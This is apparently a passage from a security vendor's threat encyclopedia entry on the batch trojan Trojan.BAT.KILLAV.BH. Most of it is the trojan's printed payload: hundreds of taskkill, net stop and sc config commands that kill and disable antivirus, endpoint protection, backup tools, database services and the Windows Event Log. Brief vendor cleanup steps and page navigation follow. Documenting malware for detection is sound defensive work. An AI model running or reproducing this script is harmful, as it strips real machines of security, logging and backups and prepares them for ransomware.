taskkill /im dpmra.exe /f
taskkill /im ravtray.exe /f
sc config MSSQL$EPOSERVER start= disabled
taskkill /im kvsrvxp_1.exe /f
sc config MSOLAP$SQL_2008 start= disabled
taskkill /im frameworkservice.exe /f
taskkill /im doscan.exe /f
net stop SamSs /y
taskkill /im cfpconfig.exe /f
taskkill /im firetray.exe /f
taskkill /im rstray.exe /f
taskkill /im kabackreport.exe /f
taskkill /im smc.exe /f
taskkill /im avshadow.exe /f
taskkill /im alunotify.exe /f
taskkill /im ashquick.exe /f
taskkill /im ssm.exe /f
sc config ntrtscan start= disabled
taskkill /im nlclient.exe /f
taskkill /im netalertclient.exe /f
net stop MSSQLServerADHelper /y
sc config CSTacacs start= disabled
taskkill /im mps.exe /f
sc config SQLAgent$ECWDB2 start= disabled
sc config MSExchangeSRS start= disabled
taskkill /im npfmsg.exe /f
sc config SstpSvc start= disabled
taskkill /im elogsvc.exe /f
taskkill /im avconfig.exe /f
net stop Cissesrv /y
sc config gupdatem start= disabled
taskkill /im vrvnet.exe /f
net stop DCAgent /y
net stop VMwareCAFCommAmqpListener /y
taskkill /im vetmsg.exe /f
net stop CSTacacs /y
taskkill /im clamwin.exe /f
taskkill /im smsx.exe /f
net stop NtmsSvc /y
sc config DB2DAS00 start= disabled
net stop VeeamMountSvc /y
net stop BackupExecDeviceMediaService /y
taskkill /im repmgr64.exe /f
net stop IDriverT /y
net stop SMTPSvc /y
net stop vmware-converter-agent /y
taskkill /im fspex.exe /f
sc config swi_service start= disabled
taskkill /im ppppwallrun.exe /f
taskkill /im nortonsecurity.exe /f
sc config VeeamCatalogSvc start= disabled
sc config odserv start= disabled
taskkill /im ravmon.exe /f
sc config NetDDE start= disabled
net stop TSM /y
taskkill /im okclient.exe /f
taskkill /im smoutlookpack.exe /f
taskkill /im mfevtps.exe /f
net stop SQLAgent$PRACTTICEBGC /y
taskkill /im mcmnhdlr.exe /f
taskkill /im fprottray.exe /f
sc config "SQL Backups" start= disabled
net stop SentinelStaticEngine /y
taskkill /im pthosttr.exe /f
taskkill /im zonealarm.exe /f
sc config SentinelHelperService start= disabled
taskkill /im qoeloader.exe /f
taskkill /im bdc.exe /f
sc config ReportServer$SQL_2008 start= disabled
taskkill /im npfsvice.exe /f
sc config swi_update_64 start= disabled
taskkill /im drwagnui.exe /f
sc config Net2ClientSvc start= disabled
taskkill /im drwinst.exe /f
net stop ReportServer$TPSAMA /y
taskkill /im rasupd.exe /f
sc config AcrSch2Svc start= disabled
sc config MSExchangeES start= disabled
taskkill /im ashdisp.exe /f
taskkill /im dbeng50.exe /f
taskkill /im ccap.exe /f
taskkill /im musnotificationux.exe /f
taskkill /im aswupdsv.exe /f
sc config MSSQL$TPSAMA start= disabled
net stop MSSQLFDLauncher$SHAREPOINT /y
taskkill /im entitymain.exe /f
taskkill /im cfpconfg.exe /f
net stop McTaskManager /y
taskkill /im ccschedulersvc.exe /f
net stop PDVFSService /y
taskkill /im isscsf.exe /f
sc config tmlisten start= disabled
net stop "Enterprise Client Service" /y
taskkill /im blackd.exe /f
taskkill /im ndrvx.exe /f
taskkill /im inicio.exe /f
net stop SQLAgent$BKUPEXEC /y
taskkill /im savfmsectrl.exe /f
sc config AcronisAgent start= disabled
taskkill /im kanmcmain.exe /f
taskkill /im mpfagent.exe /f
taskkill /im update_task.exe /f
taskkill /im sesclu.exe /f
taskkill /im aclient.exe /f
taskkill /im encsvc.exe /f
taskkill /im ccproxy.exe /f
sc config SentinelAgent start= disabled
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
taskkill /im csauth.exe /f
net stop MBAMService /y
taskkill /im cfpsbmit.exe /f
net stop SQLSafeOLRService /y
taskkill /im svtray.exe /f
taskkill /im vpdn_lu.exe /f
taskkill /im gcasdtserv.exe /f
taskkill /im qdcsfs.exe /f
net stop ReportServer$SYSTEM_BGC /y
taskkill /im proficypublisherservice.exe /f
net stop WdNisSvc /y
net stop AdobeARMservice /y
net stop VeeamCloudSvc /y
taskkill /im masalert.exe /f
taskkill /im pcscnsrv.exe /f
taskkill /im securitymanager.exe /f
taskkill /im swc_service.exe /f
taskkill /im msseces.exe /f
net stop SQLAgent$TPS /y
sc config VMware start= disabled
taskkill /im cramtray.exe /f
taskkill /im avkwctl.exe /f
taskkill /im nsmdreal.exe /f
taskkill /im keysvc.exe /f
taskkill /im clpsla.exe /f
taskkill /im ntevl.exe /f
taskkill /im savroam.exe /f
taskkill /im drwebscd.exe /f
net stop OracleClientCache80 /y
taskkill /im pop3trap.exe /f
net stop MSSQL$TPSAMA /y
taskkill /im prreader.exe /f
net stop Symantec /y
taskkill /im qserver.exe /f
taskkill /im vmwaretray.exe /f
net stop NtLmSsp /y
sc config GoogleChromeElevationService start= disabled
sc config LRSDRVX start= disabled
net stop mfemms /y
taskkill /im pavfires.exe /f
taskkill /im ixaptsvc.exe /f
taskkill /im nsctop.exe /f
taskkill /im amsvc.exe /f
taskkill /im sahookmain.exe /f
taskkill /im isntsmtp.exe /f
taskkill /im v3clnsrv.exe /f
taskkill /im chrome.exe /f
taskkill /im mcpromgr.exe /f
taskkill /im svcgenerichost /f
taskkill /im cmgrdian.exe /f
taskkill /im cpdclnt.exe /f
net stop tpautoconnsvc /y
taskkill /im useranalysis.exe /f
taskkill /im ca.exe /f
taskkill /im ccnfagent.exe /f
taskkill /im psimreal.exe /f
taskkill /im snichecksrv.exe /f
taskkill /im excel.exe /f
taskkill /im prconfigmgr.exe /f
sc config SAVService start= disabled
taskkill /im mcscript_inuse.exe /f
taskkill /im traflnsp.exe /f
taskkill /im wordpad.exe /f
sc config TrueKey start= disabled
taskkill /im xfilter.exe /f
taskkill /im msksrver.exe /f
taskkill /im fnplicensingservice.exe /f
sc config Smcinst start= disabled
taskkill /im client64.exe /f
taskkill /im scanwscs.exe /f
taskkill /im snicon.exe /f
taskkill /im blackice.exe /f
taskkill /im dolphincharge.e /f
net stop SQLAgent$PRACTTICEMGT /y
sc config POP3Svc start= disabled
sc config MSSQLServerADHelper start= disabled
taskkill /im mcepoc.exe /f
taskkill /im gziface.exe /f
taskkill /im securitycenter.exe /f
net stop ARSM /y
taskkill /im routernt.exe /f
taskkill /im vprosvc.exe /f
taskkill /im kwsprod.exe /f
taskkill /im giantantispywareupdater.exe /f
taskkill /im mcsysmon.exe /f
sc config epredline start= disable
taskkill /im atwsctsk.exe /f
net stop System /y
taskkill /im prprintserver.exe /f
taskkill /im aus.exe /f
sc config swi_update start= disabled
taskkill /im managementagenthost.exe /f
taskkill /im cctray.exe /f
taskkill /im rfwproxy.exe /f
taskkill /im cavtray.exe /f
sc config VeeamRESTSvc start= disabled
taskkill /im prschedulemgr.exe /f
net stop SstpSvc /y
taskkill /im nimcluster.exe /f
taskkill /im stwatchdog.exe /f
taskkill /im googlecrashhandler64.exe /f
taskkill /im ccemflsv.exe /f
sc config IMAP4Svc start= disabled
sc config MSSQLFDLauncher$SBSMONITORING start= disabled
sc config MSSQL$SQLEXPRESS start= disabled
sc config TrueKeyServiceHelper start= disabled
taskkill /im zanda.exe /f
taskkill /im unvet32.exe /f
taskkill /im smselog.exe /f
taskkill /im winvnc4.exe /f
taskkill /im pshost.exe /f
taskkill /im thunderbird.exe /f
taskkill /im itmrt_supportdiagnostics.exe /f
taskkill /im sdrservice.exe /f
taskkill /im persfw.exe /f
taskkill /im comhost.exe /f
net stop TmPfw /y
taskkill /im fcdblog.exe /f
taskkill /im kvsrvxp.exe /f
taskkill /im v3imscn.exe /f
taskkill /im dbserv.exe /f
net stop IBMDSServer41 /y
taskkill /im apvxdwin.exe /f
taskkill /im almon.exe /f
taskkill /im kmailmon.exe /f
taskkill /im drwebwin.exe /f
taskkill /im isqlplussvc.exe /f
taskkill /im onlnsvc.exe /f
sc config EPSecurityService start= disable
taskkill /im drwebupw.exe /f
taskkill /im mcuimgr.exe /f
net stop DB2LICD_DB2COPY1 /y
net stop ccSetMgr /y
taskkill /im clps.exe /f
taskkill /im cpntsrv.exe /f
sc config epag start= disable
sc config Eventlog start= disabled
taskkill /im vptray.exe /f
taskkill /im dsmcsvc.exe /f
net stop BITS /y
net stop epag /y
taskkill /im vrvmail.exe /f
sc config SQLAgent$TPS start= disabled
taskkill /im capfsem.exe /f
taskkill /im sms.exe /f
taskkill /im navectrl.exe /f
taskkill /im uploadrecord.exe /f
taskkill /im pavmail.exe /f
taskkill /im proficyserver.exe /f
taskkill /im fmon.exe /f
taskkill /im gcasnotice.exe /f
taskkill /im tbmon.exe /f
taskkill /im pop3pack.exe /f
taskkill /im mbamtray.exe /f
net stop UI0Detect /y
net stop MSExchangeMGMT /y
taskkill /im v3svc.exe /f
taskkill /im mcdetect.exe /f
taskkill /im rav.exe /f
taskkill /im savfmselog.exe /f
net stop VeeamRESTSvc /y
taskkill /im fscuif.exe /f
taskkill /im nmagent.exe /f
taskkill /im pwdfilthelp.exe /f
net stop MSSQL$TPS /y
taskkill /im scfagent_64.exe /f
net stop MsDtsServer110 /y
sc config W3Svc start= disabled
sc config SQLAgent$VEEAMSQL2008R2 start= disabled
taskkill /im esecservice.exe /f
taskkill /im cwbunnav.exe /f
taskkill /im nscsrvce.exe /f
net stop SQLWriter /y
net stop VeeamEnterpriseManagerSvc /y
taskkill /im tbirdconfig.exe /f
sc config BITSstart= disabled
net stop masvc /y
taskkill /im msdtssrvr.exe /f
taskkill /im psctris.exe /f
sc config SQLAgent$NET2 start= disabled
sc config SQLAgent$CITRIX_METAFRAME start= disabled
net stop ccEvtMgr /y
taskkill /im klserver.exe /f
taskkill /im proficyclient.exe4 /f
net stop McShield /y
taskkill /im rdrcef.exe /f
taskkill /im cntaosmgr.exe /f
taskkill /im v3medic.exe /f
taskkill /im ssecuritymanager.exe /f
net stop FA_Scheduler /y
taskkill /im snicheckadm.exe /f
taskkill /im caavguiscan.exe /f
taskkill /im pavupg.exe /f
taskkill /im fcssas.exe /f
taskkill /im ashmaisv.exe /f
taskkill /im srvmon.exe /f
taskkill /im caav.exe /f
sc config MSExchangeMGMT start= disabled
taskkill /im pxeservice.exe /f
taskkill /im aluschedulersvc.exe /f
sc config VMwareCAFCommAmqpListener start= disabled
net stop SAVService /y
taskkill /im smsetask.exe /f
taskkill /im firesvc.exe /f
taskkill /im massrv.exe /f
net stop TPVCGateway /y
taskkill /im klnagent.exe /f
net stop DB2 /y
net stop MSSQLSERVER /y
taskkill /im printdevice.exe /f
sc config SQLAgent$SHAREPOINT start= disabled
net stop SentinelHelperService /y
sc config BackupExecDeviceMediaService start= disabled
taskkill /im pccclient.exe /f
sc config CpqRcmc3 start= disabled
taskkill /im npfmsg2.exe /f
taskkill /im rfwmain.exe /f
taskkill /im rpcserv.exe /f
taskkill /im bdagent.exe /f
taskkill /im smsesjm.exe /f
taskkill /im savfmsespamstatsmanager.exe /f
taskkill /im googleupdate.exe /f
taskkill /im evtarmgr.exe /f
sc config UI0Detect start= disabled
sc config MsDtsServer130 start= disabled
taskkill /im nslocollectorservice.exe /f
sc config MSSQL$SHAREPOINT start= disabled
taskkill /im stinger.exe /f
taskkill /im amswmagt /f
taskkill /im spiderui.exe /f
taskkill /im mcnasvc.exe /f
taskkill /im cafw.exe /f
net stop VGAuthService /y
taskkill /im drwebcgp.exe /f
sc config MSOLAP$TPSAMA start= disabled
net stop Smcinst /y
taskkill /im atrshost.exe /f
taskkill /im csrss_tc.exe /f
taskkill /im alertsvc.exe /f
taskkill /im pagentwd.exe /f
taskkill /im wtusystemsuport.exe /f
net stop POP3Svc /y
taskkill /im mysqld-opt.exe /f
taskkill /im setupguimngr.exe /f
taskkill /im loggingserver.exe /f
net stop SQLBrowser /y
taskkill /im coreframeworkhost.exe /f
taskkill /im aexnsagent.exe /f
taskkill /im mskdetct.exe /f
sc config wbengine start= disabled
taskkill /im fsm32.exe /f
taskkill /im nmain.exe /f
taskkill /im kpf4ss.exe /f
sc config mfemms start= disabled
sc config MSOLAP$TPS start= disabled
taskkill /im klswd.exe /f
taskkill /im wscntfy.exe /f
sc config MSSQLFDLauncher$TPS start= disabled
taskkill /im mysqld-nt.exe /f
taskkill /im macompatsvc.exe /f
taskkill /im fsaua.exe /f
net stop NetDDE /y
taskkill /im fsqh.exe /f
taskkill /im avltmain.exe /f
taskkill /im certificationmanagerservicent.exe /f
sc config SnowInventoryClient start= disabled
sc config PDVFSService start= disabled
sc config vmware-converter-agent start= disabled
net stop ose /y
taskkill /im config_api_service.exe /f
taskkill /im smex_master.exe /f
sc config ProLiantMonitor start= disabled
sc config SDD_Service start= disabled
sc config vmware-converter-worker start= disabled
sc config SQLAgent$TPSAMA start= disabled
taskkill /im mbamservice.exe /f
taskkill /im ccpxysvc.exe /f
taskkill /im gcasservalert.exe /f
taskkill /im mcvsftsn.exe /f
net stop DB2DAS00 /y
sc config BlueStripeCollector start= disabled
taskkill /im coreserviceshell.exe /f
sc config SQLBrowser start= disabled
net stop MSSQLFDLauncher$TPSAMA /y
taskkill /im mfeesp.exe /f
taskkill /im fwinst.exe /f
taskkill /im sevinst.exe /f
sc config SQLSafeOLRService start= disabled
sc config VMwareCAFManagementAgentHost start= disabled
net stop "Acronis VSS Provider" /y
taskkill /im tiaspn~1.exe /f
net stop avbackup /y
taskkill /im preventmgr.exe /f
taskkill /im gdfwsvc.exe /f
sc config SQLAgent$EPOSERVER start= disabled
net stop MSSQL$SBSMONITORING /y
taskkill /im firefoxconfig.exe /f
taskkill /im patrolperf.exe /f
taskkill /im webproxy.exe /f
taskkill /im aexnsrcvsvc.exe /f
taskkill /im tfservice.exe /f
taskkill /im aswwebsv.exe /f
taskkill /im v3main.exe /f
sc config ReportServer start= disabled
taskkill /im msmpeng.exe /f
taskkill /im ashsimp2.exe /f
taskkill /im inoweb.exe /f
taskkill /im mcapexe.exe /f
taskkill /im ntcadaemon.exe /f
taskkill /im outpost.exe /f
taskkill /im ad-aware2007.exe /f
taskkill /im alogserv.exe /f
taskkill /im op_viewer.exe /f
taskkill /im aps.exe /f
taskkill /im fssm32.exe /f
net stop CpqRcmc3 /y
taskkill /im ccflic0.exe /f
taskkill /im mcmscsvc.exe /f
taskkill /im ashbug.exe /f
taskkill /im kb891711.exe /f
taskkill /im prcalculationmgr.exe /f
taskkill /im cfnotsrvd.exe /f
taskkill /im powerpnt.exe /f
sc config SQLAgent$ITRIS start= disabled
taskkill /im idsinst.exe /f
taskkill /im procexp.exe /f
sc config MySQL57 start= disabled
taskkill /im cavrid.exe /f
sc config ShMonitor start= disabled
taskkill /im fshoster32.exe /f
taskkill /im saservice.exe /f
taskkill /im navesp.exe /f
taskkill /im ashcmd.exe /f
sc config SQLWriter start= disabled
taskkill /im etconsole3.exe /f
net stop MSSQL$SYSTEM_BGC /y
sc config SamSs start= disabled
taskkill /im fsorsp.exe /f
net stop MSSQL$SQLEXPRESS /y
taskkill /im nimbus.exe /f
taskkill /im privacyiconclient.exe /f
taskkill /im cfpupdat.exe /f
net stop MSSQLServerADHelper100 /y
taskkill /im kis.exe /f
taskkill /im mfefw.exe /f
taskkill /im vmtoolsd.exe /f
taskkill /im csinsm32.exe /f
taskkill /im crssvc.exe /f
taskkill /im ngserver.exe /f
net stop SQLAgent$TPSAMA /y
taskkill /im itmrt_trace.exe /f
taskkill /im endpointsecurity.exe /f
taskkill /im engineserver.exe /f
net stop MBEndpointAgent /y
sc config msftesql$PROD start= disabled
sc config EhttpSrv start= disabled
taskkill /im proficysts.exe /f
taskkill /im umxcfg.exe /f
taskkill /im spiderml.exe /f
taskkill /im drweb32.exe /f
net stop SSISTELEMETRY130 /y
taskkill /im mpftray.exe /f
taskkill /im pctsauxs.exe /f
taskkill /im cavscan.exe /f
taskkill /im cylancesvc.exe /f
taskkill /im sgbhp.exe /f
taskkill /im symtray.exe /f
taskkill /im bcreporter.exe /f
taskkill /im cclaw.exe /f
taskkill /im prdatabasemgr.exe /f
net stop SDRSVC /y
net stop MSOLAP$TPSAMA /y
taskkill /im wfxctl32.exe /f
taskkill /im swnetsup.exe /f
taskkill /im aflogvw.exe /f
taskkill /im prftpengine.exe /f
taskkill /im fih32.exe /f
net stop VMTools /y
net stop ImapiService /y
taskkill /im oespamtest.exe /f
taskkill /im kislive.exe /f
sc config svcGenericHost start= disabled
taskkill /im ppclean.exe /f
net stop gupdate /y
taskkill /im cylanceui.exe /f
net stop SepMasterServiceMig /y
net stop NimbusWatcherService /y
taskkill /im reportingservicesservice.exe /f
taskkill /im hasplmv.exe /f
taskkill /im hpqwmiex.exe /f
taskkill /im aupdrun.exe /f
taskkill /im clpsls.exe /f
taskkill /im svcharge.exe /f
sc config MSExchangeMTA start= disabled
taskkill /im nsmdtr.exe /f
taskkill /im wrsa.exe /f
taskkill /im caavcmdscan.exe /f
net stop mfefire /y
taskkill /im tftray.exe /f
taskkill /im krbcc32s.exe /f
taskkill /im dr_serviceengine.exe /f
net stop IBMDataServerMgr /y
taskkill /im capfasem.exe /f
taskkill /im bavtray.exe /f
taskkill /im workflowresttest.exe /f
sc config BackupExecAgentBrowser start= disabled
sc config MSOLAP$SYSTEM_BGC start= disabled
net stop TrueKey /y
net stop msftesql$PROD /y
taskkill /im xfssvccon.exe /f
taskkill /im rnav.exe /f
taskkill /im fch32.exe /f
sc config SQLAgent$PROD start= disabled
taskkill /im dwengine.exe /f
taskkill /im prsummarymgr.exe /f
taskkill /im lwdmserver.exe /f
taskkill /im realmon.exe /f
sc config Alerter start= disabled
taskkill /im spyemergencysrv.exe /f
net stop DB2GOVERNOR_DB2COPY1 /y
net stop ESHASRV /y
taskkill /im gcasinstallhelper.exe /f
taskkill /im thebat.exe /f
taskkill /im mfewch.exe /f
taskkill /im nisoptui.exe /f
taskkill /im cka.exe /f
taskkill /im isntsysmonitor /f
taskkill /im fameh32.exe /f
taskkill /im paxton.net2.clientservice.exe /f
taskkill /im padfsvr.exe /f
sc config EPUpdateService start= disabled
net stop VeeamNFSSvc /y
taskkill /im ashskpcc.exe /f
net stop RumorServer /y
taskkill /im avconsol.exe /f
net stop MSOLAP$SYSTEM_BGC /y
taskkill /im ravstub.exe /f
taskkill /im tsatisy.exe /f
taskkill /im ixavsvc.exe /f
sc config NtLmSsp start= disabled
taskkill /im lucoms~1.exe /f
net stop TPAutoConnSvc /y
net stop TlntSvr /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop vmware-converter-worker /y
sc config MsDtsServer110 start= disabled
sc config MSSQL$SYSTEM_BGC start= disabled
net stop SntpService /y
taskkill /im mfetp.exe /f
taskkill /im avnotify.exe /f
taskkill /im sbserv.exe /f
taskkill /im acaif.exe /f
taskkill /im dwnetfilter.exe /f
taskkill /im icepack.exe /f
taskkill /im nd2svc.exe /f
taskkill /im wfxmod32.exe /f
taskkill /im scfservice.exe /f
taskkill /im kpfw32.exe /f
taskkill /im semsvc.exe /f
taskkill /im pavfnsvr.exe /f
net stop SQLAgent$CXDB /y
net stop MSSQL$PROD /y
taskkill /im redirsvc.exe /f
sc config mfefire start= disabled
taskkill /im vsmon.exe /f
taskkill /im mctray.exe /f
taskkill /im checkup.exe /f
taskkill /im leventmgr.exe /f
net stop EPProtectedService /y
taskkill /im cavrep.exe /f
sc config VeeamBackupSvc start= disabled
taskkill /im cfftplugin.exe /f
taskkill /im rnreport.exe /f
taskkill /im aexagentuihost.exe /f
sc config NetSvc start= disabled
taskkill /im savmain.exe /f
sc config McShield start= disabled
taskkill /im ravupdate.exe /f
taskkill /im etagent.exe /f
taskkill /im vsmain.exe /f
taskkill /im prlicensemgr.exe /f
taskkill /im fsdfwd.exe /f
sc config VGAuthService start= disabled
net stop BackupExecJobEngine /y
taskkill /im zillya.exe /f
net stop ReportServer$SQL_2008 /y
sc config TrueKeyScheduler start= disabled
taskkill /im emlibupdateagentnt.exe /f
taskkill /im fsaa.exe /f
taskkill /im giantantispywaremain.exe /f
taskkill /im opscan.exe /f
taskkill /im cmdagent.exe /f
sc config masvc start= disabled
taskkill /im mpcmdrun.exe /f
taskkill /im msssrv.exe /f
net stop VeeamBrokerSvc /y
taskkill /im kxeserv.exe /f
taskkill /im ocomm.exe /f
net stop swi_filter /y
taskkill /im vpatch.exe /f
taskkill /im trupd.exe /f
taskkill /im firewallgui.exe /f
taskkill /im omniagent.exe /f
taskkill /im outlook.exe /f
net stop swi_update_64 /y
taskkill /im savfmsesp.exe /f
taskkill /im svframe.exe /f
taskkill /im pctsgui.exe /f
net stop MSSQL$EPOSERVER /y
taskkill /im vmacthlp.exe /f
taskkill /im drwebwcl.exe /f
net stop W3Svc /y
taskkill /im fsgk32st.exe /f
taskkill /im snsrv.exe /f
taskkill /im qclean.exe /f
taskkill /im netsession_win.exe /f
taskkill /im smcgui.exe /f
taskkill /im dwhwizrd.exe /f
net stop MMS /y
sc config McTaskManager start= disabled
taskkill /im wfxsnt40.exe /f
net stop MSSQL$PRACTTICEBGC /y
taskkill /im scanmailoutlook.exe /f
taskkill /im masvc.exe /f
sc config TSM start= disabled
taskkill /im drwebdc.exe /f
sc config NimbusWatcherService start= disabled
taskkill /im ngctw32.exe /f
taskkill /im thebat64.exe /f
taskkill /im smsectrl.exe /f
taskkill /im execstat.exe /f
taskkill /im networkagent.exe /f

SOLUTION

Minimum Scan Engine: 9.850

FIRST VSAPI PATTERN FILE: 15.804.02

FIRST VSAPI PATTERN DATE: 14 Apr 2020

VSAPI OPR PATTERN File: 15.805.00

VSAPI OPR PATTERN Date: 15 Apr 2020

Step 1

Before doing any scans, Windows 7, Windows 8, Windows 8.1, and Windows 10 users must disable System Restore to allow full scanning of their computers.

Step 2

Note that not all files, folders, and registry keys and entries are installed on your computer during this malware's/spyware's/grayware's execution. This may be due to incomplete installation or other operating system conditions. If you do not find the same files/folders/registry information, please proceed to the next step.

Step 3

Scan your computer with your Trend Micro product to delete files detected as Trojan.BAT.KILLAV.BH. If the detected files have already been cleaned, deleted, or quarantined by your Trend Micro product, no further step is required. You may opt to simply delete the quarantined files. Please check the following Trend Micro Support pages for more information:

Did this description help? Tell us how we did.

Trojan.BAT.KILLAV.BH

OVERVIEW

TECHNICAL DETAILS

SOLUTION

Resources

Support

About Trend

Country Headquarters

Trojan.BAT.KILLAV.BH

OVERVIEW

TECHNICAL DETAILS

SOLUTION

Resources

Support

About Trend

Country Headquarters

The Americas

Middle East & Africa

Europe

Asia & Pacific